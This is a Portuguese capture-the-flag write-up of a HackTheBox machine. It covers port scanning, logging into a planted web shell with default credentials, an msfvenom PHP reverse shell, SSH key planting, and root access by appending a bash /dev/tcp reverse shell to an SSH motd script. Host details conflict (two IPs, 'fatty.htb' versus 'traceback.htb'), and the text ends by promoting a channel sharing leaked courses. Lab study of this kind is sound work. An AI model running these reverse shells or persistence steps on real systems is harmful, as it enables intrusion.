
Continuo publicando soluções enviadas para finalização de máquinas do site HackTheBox .
Neste artigo, exploramos a porta dos fundos de alguém, obtemos um shell através do Luvit e mexemos no SSH para LPE.
A conexão com o laboratório é via VPN. É recomendável não se conectar de um computador de trabalho ou de um host onde haja dados importantes para você, pois você se encontra em uma rede privada com pessoas que sabem algo sobre segurança da informação.
Informação organizacional
Recon
Esta máquina tem um endereço IP de 10.10.10.174, que adicionei a / etc / hosts.
10.10.10.181 fatty.htb
A primeira etapa é verificar as portas abertas. Uma vez que leva muito tempo para escanear todas as portas com nmap, primeiro farei isso usando masscan. Verificamos todas as portas TCP e UDP da interface tun0 a 500 pacotes por segundo.
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.181 --rate=500

Agora, para obter informações mais detalhadas sobre os serviços executados nas portas, execute uma varredura com a opção -A.
nmap -A traceback.htb -p22,80

O host executa um serviço SSH e um servidor web. Depois de entrar no servidor web, não encontraremos nada, exceto a mensagem.

Mas encontramos algo interessante no código-fonte.

Mas depois de pesquisar essa linha, vamos para a página do github .


Ponto de entrada
Examinando esses arquivos, determinamos que o arquivo smevk.php foi carregado no servidor.

No código-fonte do github, encontramos as credenciais padrão e fazemos login.


Vamos gerar um shell PHP e executar o ouvinte.
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.15.60 LPORT=4321 -f raw > r.php
cat r.php | xclip -selection clipboard && echo '<?php ' | tr -d '\n' > r.php && xclip -selection clipboard -o >> r.php

Agora vamos carregar o shell e dar uma olhada. Obtemos a sessão do meterpreter.


USUÁRIO
No diretório inicial do usuário, encontramos arquivos e uma nota para eles.

E também em nome do usuário sysadmin, você pode executar um script lua.

Vamos iniciar o shell.

Por conveniência, vamos lançar a chave SSH. Para fazer isso, geraremos um par aberto / fechado e escreveremos open em authorized_keys.

Agora vamos conectar usando o fechado e pegar a bandeira.

ROOT
Vamos executar o script básico de enumeração LinPEAS. E no relatório encontraremos arquivos interessantes para gravação.


Portanto, o arquivo /etc/update-motd.d/00-header é executado toda vez que uma conexão SSH é feita. Vamos verificar com o pspy. Vamos executar este utilitário e conectar via SSH.

Vamos adicionar um shell reverso a este arquivo.
echo “bash -i >& /dev/tcp/10.10.15.60/5432 0>&1” >> /etc/update-motd.d/00-header
Agora iremos conectar imediatamente e ver a conexão de retorno ao nosso host.

Você pode se juntar a nós no Telegram . Lá você pode encontrar materiais interessantes, cursos que vazaram e software. Vamos reunir uma comunidade na qual haverá pessoas versadas em várias áreas de TI, para que possamos sempre ajudar uns aos outros em quaisquer questões de TI e segurança da informação.